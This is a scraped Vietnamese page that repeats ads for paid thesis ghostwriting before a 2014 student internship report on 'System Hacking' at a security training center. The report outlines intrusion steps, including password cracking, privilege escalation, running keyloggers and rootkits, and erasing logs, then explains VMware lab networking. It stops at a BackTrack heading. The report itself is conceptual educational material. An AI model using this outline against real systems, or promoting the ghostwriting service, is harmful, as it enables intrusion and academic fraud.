Tổng Hợp Đề Tài Khóa Luận Tốt Nghiệp An Toàn Thông Tin, Dễ Làm Điểm Cao. Những đề tài khóa luận điểm cao. DỊCH VỤ VIẾT THUÊ KHÓA LUẬN TỐT NGHIỆP, ZALO/TELEGRAM 0917 193 864
Xây dựng hệ thống mạng cho Công Ty Cổ Phần Trường Tân trên nền tảng server 2008laonap166
Xây dựng hệ thống mạng cho Công Ty Cổ Phần Trường Tân trên nền tảng server 2008
download full http://www.mediafire.com/download/ctm94clmsxcck6e/%5BDOTNET.VN%5DBai9-NETWORK_XayDungHeThongMang.zip
Tổng Hợp Đề Tài Khóa Luận Tốt Nghiệp An Toàn Thông Tin, Dễ Làm Điểm Cao. Những đề tài khóa luận điểm cao. DỊCH VỤ VIẾT THUÊ KHÓA LUẬN TỐT NGHIỆP, ZALO/TELEGRAM 0917 193 864
Xây dựng hệ thống mạng cho Công Ty Cổ Phần Trường Tân trên nền tảng server 2008laonap166
Xây dựng hệ thống mạng cho Công Ty Cổ Phần Trường Tân trên nền tảng server 2008
download full http://www.mediafire.com/download/ctm94clmsxcck6e/%5BDOTNET.VN%5DBai9-NETWORK_XayDungHeThongMang.zip
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPTMasterCode.vn
Mô tả những thách thức của việc bảo mật thông tin
Định nghĩa bảo mật thông tin và giải thích được lý do
khiến bảo mật thông tin trở nên quan trọng
Nhận diện các dạng tấn công phổ biến hiện nay
Liệt kê các bước cơ bản của một cuộc tấn công
Mô tả năm nguyên tắc phòng thủ cơ bản
Download luận văn đồ án tốt nghiệp ngành công nghệ thông tin với đề tài: Tìm hiểu hệ thống phát hiện xâm nhập IDS-SNORT, cho các bạn làm luận văn tham khảo
Nhận viết luận văn đại học, thạc sĩ trọn gói, chất lượng, LH ZALO=>0909232620
Tham khảo dịch vụ, bảng giá tại: https://baocaothuctap.net
Nhận viết luận văn đại học, thạc sĩ trọn gói, chất lượng, LH ZALO=>0909232620
Tham khảo dịch vụ, bảng giá tại: https://baocaothuctap.net
Download luận văn đồ án tốt nghiệp ngành công nghệ thông tin với đề tài: Tìm hiểu hệ thống phát hiện cảnh báo nguy cơ tấn công mạng, cho các bạn làm luận văn tham khảo
Bài 7: Xác thực và quản lý tài khoản - Giáo trình FPTMasterCode.vn
Mô tả ba kiểu xác thực thông tin
Giải thích những gì mà mô hình đăng nhập đơn nhất có
thể thực hiện
3
Liệt kê các thủ tục quản lý tài khoản để bảo mật mật
khẩu
Định nghĩa các hệ điều hành được tin cậy
Kịch bản demo phát hiện xâm nhập sử dụng snort idsLinh Hoang
Snort là một NIDS được Martin Roesh phát triển dưới mô hình mã nguồn mở. Tuy Snort miễn phí nhưng nó lại có rất nhiều tính năng tuyệt vời mà không phải sản phẩm thương mại nào cũng có thể có được. Với kiến trúc thiết kế theo kiểu module, người dùng có thể tự tăng cường tính năng cho hệ thống Snort của mình bằng việc cài đặt hay viết thêm mới các module. Cơ sở dữ liệu luật của Snort đã lên tới 2930 luật và được cập nhật thường xuyên bởi một cộng đồng người sử dụng. Snort có thểchạy trên nhiều hệ thống nền như Windows, Linux, OpenBSD, FreeBSD, NetBSD, Solaris, HP-UX, AIX, IRIX, MacOS. Bên cạnh việc có thể hoạt động nhưmột ứng dụng thu bắt gói tin thông thường, Snort còn có thể được cấu hình để chạy như một NIDS. Snort hỗ trợ khả năng hoạt động trên các giao thức sau: Ethernet, 802.11,Token Ring, FDDI, Cisco HDLC, SLIP, PPP, và PF của OpenBSD.
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPTMasterCode.vn
Mô tả những thách thức của việc bảo mật thông tin
Định nghĩa bảo mật thông tin và giải thích được lý do
khiến bảo mật thông tin trở nên quan trọng
Nhận diện các dạng tấn công phổ biến hiện nay
Liệt kê các bước cơ bản của một cuộc tấn công
Mô tả năm nguyên tắc phòng thủ cơ bản
Download luận văn đồ án tốt nghiệp ngành công nghệ thông tin với đề tài: Tìm hiểu hệ thống phát hiện xâm nhập IDS-SNORT, cho các bạn làm luận văn tham khảo
Nhận viết luận văn đại học, thạc sĩ trọn gói, chất lượng, LH ZALO=>0909232620
Tham khảo dịch vụ, bảng giá tại: https://baocaothuctap.net
Nhận viết luận văn đại học, thạc sĩ trọn gói, chất lượng, LH ZALO=>0909232620
Tham khảo dịch vụ, bảng giá tại: https://baocaothuctap.net
Download luận văn đồ án tốt nghiệp ngành công nghệ thông tin với đề tài: Tìm hiểu hệ thống phát hiện cảnh báo nguy cơ tấn công mạng, cho các bạn làm luận văn tham khảo
Bài 7: Xác thực và quản lý tài khoản - Giáo trình FPTMasterCode.vn
Mô tả ba kiểu xác thực thông tin
Giải thích những gì mà mô hình đăng nhập đơn nhất có
thể thực hiện
3
Liệt kê các thủ tục quản lý tài khoản để bảo mật mật
khẩu
Định nghĩa các hệ điều hành được tin cậy
Kịch bản demo phát hiện xâm nhập sử dụng snort idsLinh Hoang
Snort là một NIDS được Martin Roesh phát triển dưới mô hình mã nguồn mở. Tuy Snort miễn phí nhưng nó lại có rất nhiều tính năng tuyệt vời mà không phải sản phẩm thương mại nào cũng có thể có được. Với kiến trúc thiết kế theo kiểu module, người dùng có thể tự tăng cường tính năng cho hệ thống Snort của mình bằng việc cài đặt hay viết thêm mới các module. Cơ sở dữ liệu luật của Snort đã lên tới 2930 luật và được cập nhật thường xuyên bởi một cộng đồng người sử dụng. Snort có thểchạy trên nhiều hệ thống nền như Windows, Linux, OpenBSD, FreeBSD, NetBSD, Solaris, HP-UX, AIX, IRIX, MacOS. Bên cạnh việc có thể hoạt động nhưmột ứng dụng thu bắt gói tin thông thường, Snort còn có thể được cấu hình để chạy như một NIDS. Snort hỗ trợ khả năng hoạt động trên các giao thức sau: Ethernet, 802.11,Token Ring, FDDI, Cisco HDLC, SLIP, PPP, và PF của OpenBSD.
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lanleokidd
Trong thời đại công nghệ thông tin phát triển hiện nay lĩnh vực hạ tầng mạng được xem là phần không thể thiếu trong hầu hết các ngành nghề, các tổ chức, công ty. Phần lớn các tổ chức hay công ty có phạm vi sử dụng bị giới hạn bởi diện tích và mặt bằng đều triển khai xây dựng mạng LAN để phục vụ cho việc quản lý dữ liệu nội bộ cơ quan được thuận lợi, đảm bảo tính an toàn, bảo mật dữ liệu, đồng thời giúp các nhân viên trong tổ chức hay công ty truy cập dữ liệu một cách dễ dàng. Ngoài ra mạng LAN còn giúp cho người quản trị mạng phân quyền sử dụng tài nguyên cho từng đối tượng người dùng và thuận tiện cho việc quản lý nhân viên và điều hành công ty.
Bên cạnh đó việc bảo mật mạng LAN cũng rất quan trọng nhằm chống lại các tin tặc tấn công gây nguy hại cho người dùng trong mạng. Các cuộc tấn công mạng LAN ngày càng sử dụng những công cụ và phương thức tấn công tinh vi hơn, các tin tặc dễ dàng đánh cắp mật khẩu, tài khoản của các cơ quan, tổ chức, gây thiệt hại có thể xảy ra cho các doanh nghiệp như hoạt động sản xuất bị ngừng trệ, thông tin bị rò rỉ, thất thoát dữ liệu nhạy cảm.
Do đó đối với mỗi hệ thống, nhiệm vụ bảo mật được đặt ra cho người quản trị mạng là hết sức quan trọng và cần thiết. Xuất phát từ những thực tế đó, toi đã chọn và tìm hiểu đề tài “Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng LAN”
1. TRƯỜNG ĐẠI HỌC KHOA HỌC TỰ NHIÊN
KHOA ĐIỆN TỬ VIỄN THÔNG
- - - - - -
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG
VÀ AN NINH MẠNG QUỐC TẾ ATHENA
BÁO CÁO THỰC TẬP
SYSTEM HACKING
Giảng viên hướng dẫn: Võ Đỗ Thắng
Sinh viên thực hiện : Huỳnh Minh Trí
Thành phố Hồ Chí Minh
2. System Hacking
MỞ ĐẦU
Phát tán virus đã thực sự trở thành một ngành "công nghiệp" trong hoạt
động gián điệp năm 2013, như dự đoán từ đầu năm của Công ty An ninh mạng
Bkav. Hoạt động gián điệp này không chỉ tồn tại ở những nước phát triển như
Mỹ, Đức, Pháp… mà còn hiện hữu ngay tại Việt Nam. Trong năm qua, theo ghi
nhận của Bkav, phần mềm gián điệp đã xuất hiện tại hầu hết các cơ quan quan
trọng từ các cơ quan Chính phủ, Quốc hội tới Bộ Quốc phòng, Bộ Công an hay các
ngân hàng, viện nghiên cứu, trường đại học… Các phần mềm gián điệp này lợi
dụng lỗ hổng an ninh trong file văn bản (Word, Excel, PowerPoint) để phát tán.
Cuối năm 2013, việc lợi dụng các file văn bản để cài phần mềm gián điệp
đã tiến thêm một bước, không cần thông qua lỗ hổng mà chuyển sang sử dụng
hình thức phishing. Trung tuần tháng 12, Bkav phát hiện một loạt các vụ tin tặc
chèn mã độc vào file văn bản không sử dụng lỗ hổng. Mã độc ẩn dưới hình thức 1
ảnh thu nhỏ được nhúng trực tiếp vào file văn bản. Để đọc nội dung, chắc chắn
người dùng sẽ click để mở ảnh lớn hơn, như vậy sẽ kích hoạt mã độc. Ông Ngô
Tuấn Anh, Phó chủ tịch phụ trách An ninh mạng của Bkav, cho biết: “Với hình
thức này, bất kỳ máy tính nào cũng sẽ bị cài phần mềm gián điệp mà không cần
lỗ hổng. Phishing để cài đặt phần mềm gián điệp sẽ được sử dụng rộng rãi và sẽ
là xu hướng trong năm 2014”.
Bài báo cáo này sẽ giới thiệu tổng quát cơ bản về các phương pháp mà
Hacker sử dụng để tấn công xâm nhập và khai thác vào các phiên bản hệ điều
hành Windows, hệ điều hành phổ biến nhất hiện nay tại Việt Nam, từ đó giúp
chúng ta nắm rõ cách thức mà Hacker sử dụng và đưa ra các giải pháp giúp cho
người dùng được an toàn thông tin, bảo mật trong thời đại Internet ngày nay.
Huỳnh Minh Trí Page 1
3. System Hacking
LỜI CẢM ƠN KHOA ĐIỆN TỬ VIỄN THÔNG
TRƯỜNG ĐẠI HỌC KHOA HỌC TỰ NHIÊN TPHCM
Em xin chân thành cảm ơn trường Đại Học Khoa Học Tự Nhiên TPHCM và
khoa Điện Tử Viễn Thông đã tạo điều kiện cho em hoàn thành tốt đợt Thực Tập
này. Đợt thực tập này đã cho em những kinh nghiệm quý báu. Những kinh
nghiệm này sẽ giúp em hoàn thiện hơn trong công việc và môi trường làm việc
sau này.
Mặc dù em đã cố gắng hoàn thành báo cáo thực tập này với tất cả nỗ lực của
bản thân. Nhưng do trình độ hiểu biết và kinh nghiệm thực tế có hạn nên chắc
chắn không thể tránh khỏi những thiếu sót nhất định. Rất mong nhận được sự
đóng góp, chia sẻ để em có thể làm tốt hơn nữa. Một lần nữa em xin chân thành
cảm ơn.
TPHCM, ngày 23 tháng 10 năm 2014
Sinh viên thực tập
Huỳnh Minh Trí
Huỳnh Minh Trí Page 2
4. System Hacking
LỜI CẢM ƠN TRUNG TÂM ATHENA
Em xin cảm ơn giám đốc Công Ty Quản Trị và An Ninh Mạng Quốc Tế
Athena, cùng các anh chị trong công ty. Đặc biệt, em xin chân thành cảm ơn thầy
Đỗ Võ Thắng và thầy Lê Đình Nhân đã nhiệt tình giúp đỡ và hướng dẫn em trong
thời gian thực tập tại công ty. Thầy đã tạo mọi điều kiện thuận lợi, cung cấp
nhũng kiến thức cần thiết cũng như đóng góp những ý kiến quý báu để hoàn
thành tốt bài báo cáo này.
Em cũng xin gửi lời cám ơn đến các anh chị, bạn bè đã truyền đạt kinh
nghiệm và tạo điều kiện cho em hoàn thành đề tài này.
Trong quá trình thực hiện đề tài không thể không có những sai sót, mong
thầy cô tại trung tâm ATHENA và các bạn thẳng thắn góp ý đề em rút kinh
nghiệm trong các công trình tìm hiểu, phát triển sau này.
Một lần nữa tôi xin chân thành cảm ơn.
TPHCM, ngày 23 tháng 10 năm 2014
Sinh viên thực tập
Huỳnh Minh Trí
Huỳnh Minh Trí Page 3
5. System Hacking
GIỚI THIỆU CHUNG VỀ CÔNG TY THỰC TẬP
Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA được
thành lập từ năm 2004, là một tổ chức qui tụ nhiều trí thức trẻ Việt Nam đầy
năng động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm huyết góp
phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế
mũi nhọn, góp phần phát triển nước nhà.
Lĩnh vực hoạt động chính:
– Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên
sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc
tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song
song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành
riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân
hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính…
– Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm
ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh
mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ
Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,…
– Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương
trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa
Thành Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân (Thủ Đức), Học Viện Bưu
Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự...
Đội ngũ giảng viên :
– Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các
trường đại học hàng đầu trong nước.... Tất cả giảng viên ATHENA đều phải có các
chứng chỉ quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH, có bằng sư
phạm Quốc tế (Microsoft Certified Trainer). Đây là các chứng chỉ chuyên môn
Huỳnh Minh Trí Page 4
6. System Hacking
bắt buộc để đủ điều kiện tham gia giảng dạy tại trung tâm ATHENA
– Bên cạnh đó, các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến
thức công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan, Singapore... và
truyền đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâm
ATHENA
Liên hệ:
– Cơ sở 1:
92 Nguyễn Đình Chiểu, phường Đa Kao, Q1, TPHCM
Điện thoại: 0907879477
0943230099
(08)38244041
Gần ngã tư Đinh Tiên Hoàng - Nguyễn Đình Chiểu
– Cơ sở 2: 2 Bis Đinh Tiên Hoàng, phường Đa Kao, Q1, TPHCM
Điện thoại: 0943200088
(08)22103801
Cạnh sân vận động Hoa Lư - Cách đài truyền hình Tp HTV 50 mét
– Website: http://athena.edu.vn
http://athena.com.vn
– E-mail : support@athena.edu.vn tuvan@athena.edu.vn
tuvan@athena.edu.vn
Huỳnh Minh Trí Page 5
7. System Hacking
NHẬN XÉT CỦA KHOA
......................................................................................................................................................................................................... ................
......................................................................................................................................................................................................... ................
.................................................................................................................................................................. .......................................................
....................................................................................................................................................................................................... ..................
......................................................................................................................................................................................................... ................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
......................................................................................................................................................................................................... ................
......................................................................................................................................................................................................... ................
..................................................................................................................................................................... ....................................................
......................................................................................................................................................................................................... ................
.........................................................................................................................................................................................................................
......................................................................................................................................................................................................... ................
......................................................................................................................................................................................................... ................
.................................................................................................................................................................. .......................................................
....................................................................................................................................................................................................... ..................
......................................................................................................................................................................................................... ................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
......................................................................................................................................................................................................... ................
TPHCM, ngày ... tháng ... năm 2014
Huỳnh Minh Trí Page 6
8. System Hacking
NHẬN XÉT CỦA TRUNG TÂM
...................................................................................................................................................................................... ...................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.................................................................................................................................................................. .......................................................
.........................................................................................................................................................................................................................
.................................................................................................................................................................. .......................................................
.........................................................................................................................................................................................................................
.................................................................................................................................................................. .......................................................
....................................................................................................................................................................................................... ..................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
..................................................................................................................................................................... ....................................................
.......................................................................................................................................................................................................... ...............
.........................................................................................................................................................................................................................
.................................................................................................................................................................. .......................................................
....................................................................................................................................................................................................... ..................
.........................................................................................................................................................................................................................
TPHCM, ngày ... tháng ... năm 2014
Giám đốc
Huỳnh Minh Trí Page 7
9. System Hacking
NHẬN XÉT CỦA GIẢNG VIÊN HƯỚNG DẪN
.........................................................................................................................................................................................................................
.................................................................................................................................................................. .......................................................
....................................................................................................................................................................................................... ..................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.................................................................................................................................................................. .......................................................
....................................................................................................................................................................................................... ..................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
..................................................................................................................................................................... ....................................................
.......................................................................................................................................................................................................... ...............
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.........................................................................................................................................................................................................................
.................................................................................................................................................................. .......................................................
TPHCM, ngày ... tháng ... năm 2014
Giảng viên hướng dẫn
Huỳnh Minh Trí Page 8
12. System Hacking
PHẦN 1: GIỚI THIỆU
1. System Hacking là gì ?
System hacking bao gồm những kỹ thuật lấy username, password dựa vào
phần mềm cài trên hệ thống hoặc tính dễ cài đặt và chạy các dịch vụ từ xa của hệ
điều hành Windows. Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông
tin, xóa những log file hệ thống. Một khi đã xâm nhập vào hệ thống, Hacker có
thể thực hiện mọi thứ trên máy tính đó, gây ra những hậu quả vô cùng nghiêm
trọng cho các cá nhân, tổ chức.
2. Các lỗ hổng thường khai thác trong hệ điều hành Windows
Phần mềm máy tính ngày nay vô cùng phức tạp, bao gồm hàng ngàn dòng
mã. Phần mềm được viết ra bởi con người, nên cũng chẳng có gì lạ khi trong đó
có chứa những lỗi lập trình, được biết đến với tên gọi lỗ hổng. Những lỗ hổng
này được Hacker sử dụng để xâm nhập vào hệ thống, cũng như được tác giả của
các đọan mã độc dùng để khởi động chương trình của họ một cách tự động trên
máy tính của bạn.
Hiện nay các lỗ hổng bảo mật được phát hiện càng nhiều trong các hệ điều
hành, các Web Server hay các phần mềm khác, ... Và các hãng sản xuất luôn cập
nhật các lỗ hổng và đưa ra các phiên bản mới sau khi đã vá lại các lỗ hổng của các
phiên bản trước. Do đó, người sử dụng phải luôn cập nhật thông tin và nâng cấp
phiên bản cũ mà mình đang sử dụng nếu không các Hacker sẽ lợi dụng điều này
để tấn công vào hệ thống. Thông thường, các forum của các hãng nổi tiếng luôn
cập nhật các lỗ hổng bảo mật và việc khai thác các lỗ hổng đó như thế nào thì tùy
từng người.
Microsoft luôn có những cải tiến an ninh vượt trội qua mỗi phiên bản mới
Huỳnh Minh Trí Page 11
13. System Hacking
của hệ điều hành Windows. Tuy nhiên, một sự thật là các mối đe dọa mạng vẫn
đang ngày càng phát triển nhanh hơn so với chu trình cập nhật và đổi mới hệ
điều hành của Microsoft.
Trước tiên ta sẽ tìm hiểu tổng quát một quá trình tấn công hệ thống. Mục
tiêu phía trước của chúng ta là một hệ thống máy tính. Các bước để tấn công,
đánh sập nó, có thể được liệt kê như hình vẽ bên cạnh. Nó gồm 6 công đoạn như
sau:
Quá trình tấn công vào một hệ thống
– Enumerate (liệt kê): Trích ra tất cả những thông tin có thể về user trong
hệ thống. Sử dụng phương pháp thăm dò SNMP để có được những thông tin hữu
ích, chính xác hơn.
Huỳnh Minh Trí Page 12
14. System Hacking
– Crack: Công đoạn này có lẽ hấp dẫn nhiều Hackernhất. Bước này yêu
cầu chúng ta bẽ khóa mật khẩu đăng nhập của user. Hoặc bằng một cách nào
khác, mục tiêu phải đạt tới là quyền truy cập vào hệ thống.
– Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi giới hạn truy cập từ
user binh thường lên admin hoặc user có quyền cao hơn đủ cho chúng ta tấn
công.
– Execute (thực thi): Thực thi ứng dụng trên hệ thống máy đích. Chuẩn bị
trước malware, keylogger, rootkit…để chạy nó trên máy tính tấn công.
– Hide (ẩn file): Những file thực thi, file soucecode chạy chương trình…
Cần phải được làm ẩn đi, tránh bị mục tiêu phát hiện tiêu diệt.
– Tracks (dấu vết): Tất nhiên không phải là để lại dấu vết. Những thông
tin có liên quan đến bạn cần phải bị xóa sạch, không để lại bất cứ thứ gì. Nếu
không khả năng bạn bị phát hiện là kẻ đột nhập là rất cao.
Tóm lại, quá trình tấn công hệ thống (System hacking) là bước tiếp theo sau
quá trình khảo sát, thu thập thông tin của mục tiêu cần tấn công bằng những kỹ
thuật như Footprinting, Social engineering, Enumeration, Google Hacking… đã
được áp dụng cho mục đích truy tìm thông tin.
Khi hệ thống mục tiêu đã được xác định, chúng ta bắt đầu đi vào quá trình
tấn công hệ thống thật sự. Ta phải tiến hành những kỹ thuật khác nhau để làm
sao vào được trong hệ thống đó, thực hiện những việc mà mình mong muốn, như
xóa dữ liệu, chạy chương trình trojan, keylogger…
Huỳnh Minh Trí Page 13
15. System Hacking
PHẦN 2: VMWARE VÀ ẢO HÓA HỆ ĐIỀU HÀNH
1. Giới thiệu VMware
VMware Workstation là một phần mềm ảo hóa desktop mạnh mẽ dành
cho các nhà phát triển/kiểm tra phần mềm và các chuyên gia IT cần chạy nhiều
HĐH một lúc trên một máy PC. Người dùng có thể chạy các HĐH Windows,
Linux, Netware hay Solaris x86 trên các máy ảo di động mà không cần phải khởi
động lại hay phân vùng ổ cứng. VMware Workstation cung cấp khả năng hoạt
động tuyệt vời và nhiều tính năng mới như tối ưu hóa bộ nhớ và khả năng quản
lý các thiết lập nhiều lớp. Các tính năng thiết yếu như mạng ảo, chụp ảnh nhanh
trực tiếp, kéo thả, chia sẻ thư mục và hỗ trợ PXE khiến VMware Workstation trở
thành công cụ mạnh mẽ nhất và không thể thiếu cho các nhà doanh nghiệp phát
triển tin học và các nhà quản trị hệ thống.
Với hàng triệu khách hàng và hàng loạt các giải thưởng quan trọng, VMware
Workstation đã được chứng minh là một công ghệ giúp tăng năng suất và sự linh
họat trong công việc. Đây là một công cụ không thể thiếu cho các nhà phát triển
phần mềm và các chuyên gia IT trên toàn thế giới.
VMware Workstation họat động bằng cách cho phép nhiều HĐH và các ứng
dụng của chúng chạy đồng thời trên một máy duy nhất. Các HĐH và ứng dụng
này được tách ra vào trong các máy ảo. Những máy ảo này cùng tồn tại trên một
phần cứng duy nhất. Các layer ảo của VMware sẽ kết nối các phần cứng vật lý với
các máy ảo, do đó mỗi máy ảo sẽ có CPU, bộ nhớ, các ổ đĩa, thiết bị nhập/xuất
riêng.
Các tính năng cho người dùng:
– Thiết lập và thử nghiệm các ứng dụng đa lớp, cập nhật ứng dụng và các
Huỳnh Minh Trí Page 14
16. System Hacking
miếng vá cho HĐH chỉ trên một PC duy nhất.
– Dễ dàng phục hồi và chia sẻ các môi trường thử nghiệm được lưu trữ;
giảm thiểu các thiết lập trùng lặp và thời gian thiết lập.
– Làm cho việc học tập trên máy tính thuận lợi hơn do sinh viên luôn đuợc
sử dụng máy với tình trạng “sạch sẽ” và thử nghiệm với nhiều HĐH, ứng dụng cá
các công cụ trên những máy ảo an tòan và độc lập.
– Chạy các bản demo phần mềm với các thiết lập phức tạp hoặc đa lớp trên
một chiếc laptop
– Tăng tốc độ giải quyết các rắc rối của người dùng cuối dựa trên một thư
viện các máy ảo được thiết lập sẵn
Những tính năng chính:
– Hỗ trợ nhiều màn hình: Bạn có thể thiết lập để một VM trải rộng ra nhiều
màn hình, hoặc nhiều VM, với mỗi VM trên một màn hình riêng biệt.
– Hỗ trợ các thiết bị USB 2.0: Bây giờ bạn đã có thể sử dụng các thiết bị
ngọai vi yêu cầu tốc độ làm việc cao trên VM, như máy MP3 và các thiết bị lưu
trữ di động khác
– VM Record/Replay: Bạn có thể sử dụng tính năng này để thu lại các hoạt
động của VM và được đảm bảo là sẽ tái lập lại tình trạng của VM chính xác 100%.
– Integrated Virtual Debugger: Workstation được tích hợp Visual Studio và
Eclipse nên bạn có thể trực tiếp sử dụng, chạy và vá các lỗ hổng của các chương
trình trong một VM từ một IDE yêu thích
– Automation APIs (VIX API 2.0): Bạn có thể viết script hay chương trình để
Huỳnh Minh Trí Page 15
17. System Hacking
VM tự động thực hiện việc kiểm tra.
Cách tạo nên các máy ảo từ VMware:
Để sử dụng VMware đầu tiên chúng ta cần tạo nên một máy ảo, nơi mà
chúng ta sẽ dùng để cài đặt nên các hệ điều hành. Chúng ta có thể tuỳ chọn dung
lượng ổ cứng, dung lượng RAM, cách kết nối mạng của máy ảo… Việc tiếp theo
cần làm là cài đặt nên một hệ điều hành trên máy ảo đó. Hiện tại, VMware hỗ trợ
cài đặt rất nhiều dạng hệ điều hành. Chúng ta có thể cài các phiên bản của
Windows, Linux, Unix… trên các máy ảo VMware. Việc cài đặt hệ điều hành trên
máy ảo hoàn toàn tương tự như cách cài đặt trên các máy thật.
2. Chia sẻ tài nguyên của các máy ảo:
Chia sẻ CPU và RAM: Các máy ảo sẽ chia sẻ CPU và RAM của máy tính thật.
Để đảm bảo hệ thống có thể chạy tốt, yêu cầu máy tính thật phải có cấu hình
tương đối cao, khoảng 1GB RAM để có thể chạy đồng thời 4, 5 máy ảo.
Chia sẻ ổ cứng: Khi tạo ra các máy ảo, chúng ta sẽ tạo ra một ổ cứng dành
riêng cho máy ảo nằm trên máy thật. Ổ cứng ảo này được tạo trên vùng đĩa trống
của ổ đĩa thật, do đó không ảnh hưởng đến các dữ liệu đang có trên ổ đĩa thật.
Chúng ta có thể tuỳ chọn dung lượng của ổ cứng này, có thể ấn định ngay dung
lượng hoặc cũng có thể để dung lượng của ổ cứng này là động, sẽ thay đổi tuỳ
theo quá trình sử dụng của chúng ta sau này.
Chia sẻ card mạng: Sau khi cài đặt lên, VMware sẻ tạo nên 2 card mạng
VMware 1 và VMware 8 trên máy thật và máy thật có thể sử dụng 2 card mạng
này để kết nối với các máy ảo. Khi lựa chọn cấu hình mạng cho các máy ảo, ta có
thể chọn một trong các chế độ sau:
– Bridged networking: Card mạng của máy ảo sẽ được gắn trực tiếp với
Huỳnh Minh Trí Page 16
18. System Hacking
card mạng của máy thật (sử dụng switch ảo VMnet0). Lúc này, máy ảo sẽ đóng
vai trò như một máy trong mạng thật, có thể nhận DHCP từ mạng ngoài, hoặc đặt
IP tĩnh cùng dải với mạng ngoài để giao tiếp với các máy ngoài mạng hoặc lên
Internet.
Cấu trúc mạng Bridged Networking
– NAT: Máy ảo được cấu hình NAT sẽ sử dụng IP của máy thật để giao tiếp
với mạng ngoài. Các máy ảo được cấp địa chỉ IP nhờ một DHCP ảo của VMware.
Lúc này, các máy ảo sẽ kết nối với máy thật qua switch ảo VMnet8, và máy thật
sẽ đóng vai trò NAT server cho các máy ảo.
Cấu trúc mạng NAT
– Host-only Networking: Khi cấu hình máy ảo sử dụng host-only
networking, máy ảo sẽ được kết nối với máy thật trong một mạng riêng thông
qua Switch ảo VMnet1. Địa chỉ của máy ảo và máy thật trong mạng host-only có
thể được cấp bởi DHCP ảo gắn liền với Switch ảo Vmnet1 hoặc có thể đặt địa chỉ
IP tĩnh cùng dải để kết nối với nhau.
Huỳnh Minh Trí Page 17
19. System Hacking
Cấu trúc mạng Host-Only
– Ngoài các kết nối trên, ta có thể sử dụng các switch ảo trong VMware để
kết nối các máy ảo thành một hệ thống như mong muốn. Khi cài đặt lên, VMware
tạo sẵn cho chúng ta 10 Switch ảo từ VMnet0 đến VMnet9. Ngoài các Switch ảo
VMnet0 (dùng cho mạng Bridged Networking), VMnet8 (dùng cho mạng Nat
Networking) và VMnet1 (dùng cho mạng Host-Only Networking), chúng ta còn 7
Switch ảo khác để thực hiện việc kết nối các máy ảo. Chúng ta có thể đặt IP động
trên các máy nối với các Switch này để nhận DHCP ảo, hoặc có thể đặt IP tĩnh
cùng dải cho các máy này đảm bảo chúng kết nối được với nhau.
Chia sẻ ổ đĩa CD-ROM: Các máy ảo có thể sử dụng ổ CD-ROM của máy thật.
Ngoài ra, ta có thể dùng một file ISO để đưa vào ổ CD-ROM của máy ảo, lúc này
máy ảo sẽ nhận file ISO giống như một đĩa CD-ROM trong ổ đĩa của mình.
3. Sử dụng Snapshot:
Snapshot một máy ảo cho phép ta lưu lại trạng thái của máy ảo tại thời điểm
đó. Snapshot sẽ lưu lại thông tin về ổ cứng, Ram và các Setting trên máy ảo. Sau
khi lưu snapshot, chúng ta có thể quay trở lại trạng thái của máy ảo bất cứ lúc
nào.
Huỳnh Minh Trí Page 18
20. System Hacking
VMware cho phép chúng ta lưu nhiều snapshot của máy ảo, vì thế người
dùng có thể sử dụng một máy ảo vào nhiều ngữ cảnh khác nhau, tiết kiệm thời
gian cho việc cấu hình. Chẳng hạn với một máy ảo A, trong một bài lab ta muốn
nó là một máy chủ Domain Controller, nhưng trong bài lab khác ta muốn xấy
dựng nó thành một máy chủ ISA. Để giải quyết vấn đề này, chúng ta có thể lưu
snapshot của máy A tại thời điểm nó là domain controller, sau đó cấu hình nó
thành một máy chủ ISA và lưu snapshot. Khi cần sử dụng máy ảo A với vai trò là
một Domain Controller hay ISA, ta sẽ dùng trình quản lý Snapshot Manager để
chuyển tới trạng thái mong muốn.
PHẦN 3: SỬ DỤNG BACKTRACK ĐỂ KHAI THÁC XÂM NHẬP
TRONG MẠNG LAN
1. Hệ điều hành Backtrack 5 R3
